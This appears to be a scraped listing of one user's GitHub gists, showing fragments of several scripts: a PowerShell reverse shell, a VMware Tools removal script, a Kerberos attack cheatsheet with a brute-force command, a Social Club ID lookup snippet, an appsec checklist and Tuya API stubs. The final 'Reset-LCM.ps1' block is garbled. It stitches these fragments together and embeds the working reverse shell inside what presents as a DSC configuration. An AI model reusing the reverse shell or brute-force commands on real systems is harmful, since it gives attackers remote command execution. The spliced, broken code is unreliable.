Dave Hall bobalob

## powershell_reverse_shell.ps1
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ('. {' + $data + '} *>&1') | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

## Remove_VMwareTools.ps1
# This script will manually rip out all VMware Tools registry entries and files for Windows 2008-2019
# Tested for 2019, 2016, and probably works on 2012 R2 after the 2016 fixes.

# This function pulls out the common ID used for most of the VMware registry entries along with the ID
# associated with the MSI for VMware Tools.
function Get-VMwareToolsInstallerID {
    foreach ($item in $(Get-ChildItem Registry::HKEY_CLASSES_ROOT\Installer\Products)) {
        If ($item.GetValue('ProductName') -eq 'VMware Tools') {
            return @{
                reg_id = $item.PSChildName;

## kerberos_attacks_cheatsheet.md

      
              1 file
            
          
              373 forks
            
          
              5 comments
            
          
              1085 stars
            
          
                TarlogicSecurity
                / kerberos_attacks_cheatsheet.md
            
            
              Created
              May 14, 2019 13:33
            
              
                A cheatsheet with commands that can be used to perform kerberos attacks
              
          
    Kerberos cheatsheet

Bruteforcing

With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:

  
## findSCIDbyUsername.js
/*
1. Must be logged on "socialclub.rockstargames.com" domain
2. Paste in dev tools console (CTRL+SHIFT+I)
3. Paste the below code & enter username in prompt
*/
var ID2find = prompt("What is the social club username?");
var req = new XMLHttpRequest();
req.onreadystatechange=function(){
    if(req.readyState ===4){
        var res = JSON.parse(req.response);

## Testing_Checklist.md

      
              1 file
            
          
              137 forks
            
          
              2 comments
            
          
              263 stars
            
          
                jhaddix
                / Testing_Checklist.md
            
            
              Last active
              April 26, 2024 21:38
                — forked from amotmot/WAHH_Task_Checklist.md
            
              
                Fast Simple Appsec Testing Checklist 
              
          
    Fast Testing Checklist

A combination of my own methodology and the Web Application Hacker's Handbook Task checklist, as a Github-Flavored Markdown file
Contents


Recon and analysis
Test handling of access
Test handling of input
Test application logic
Assess application hosting
Miscellaneous tests


## tuya_cloud.py
import requests
import hashlib
import time
import uuid
import os
import copy
import json

# Fixed up version of my previous code to work with the Cloud endpoints.
# Hopefully this works.

## sign.py
import requests
import hashlib
import time
import uuid
import os
import copy
import json

# This is based on my personal implementation but stripped down to only what is
# needed to verify it.

## all.txt

.
..
........
@
*
*.*
*.*.*
ðŸŽ

## Reset-LCM.ps1

Param(
[string[]]$Computername = "chi-test02"
)

[DscLocalConfigurationManager()]
Configuration ResetLCM {

Param([string[]]$Computername)
	# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

	$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535\|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ('. {' + $data + '} *>&1') \| Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
	# This script will manually rip out all VMware Tools registry entries and files for Windows 2008-2019
	# Tested for 2019, 2016, and probably works on 2012 R2 after the 2016 fixes.

	# This function pulls out the common ID used for most of the VMware registry entries along with the ID
	# associated with the MSI for VMware Tools.
	function Get-VMwareToolsInstallerID {
	foreach ($item in $(Get-ChildItem Registry::HKEY_CLASSES_ROOT\Installer\Products)) {
	If ($item.GetValue('ProductName') -eq 'VMware Tools') {
	return @{
	reg_id = $item.PSChildName;
	/*
	1. Must be logged on "socialclub.rockstargames.com" domain
	2. Paste in dev tools console (CTRL+SHIFT+I)
	3. Paste the below code & enter username in prompt
	*/
	var ID2find = prompt("What is the social club username?");
	var req = new XMLHttpRequest();
	req.onreadystatechange=function(){
	if(req.readyState ===4){
	var res = JSON.parse(req.response);
	import requests
	import hashlib
	import time
	import uuid
	import os
	import copy
	import json

	# Fixed up version of my previous code to work with the Cloud endpoints.
	# Hopefully this works.

	Param(
	[string[]]$Computername = "chi-test02"
	)

	[DscLocalConfigurationManager()]
	Configuration ResetLCM {

	Param([string[]]$Computername)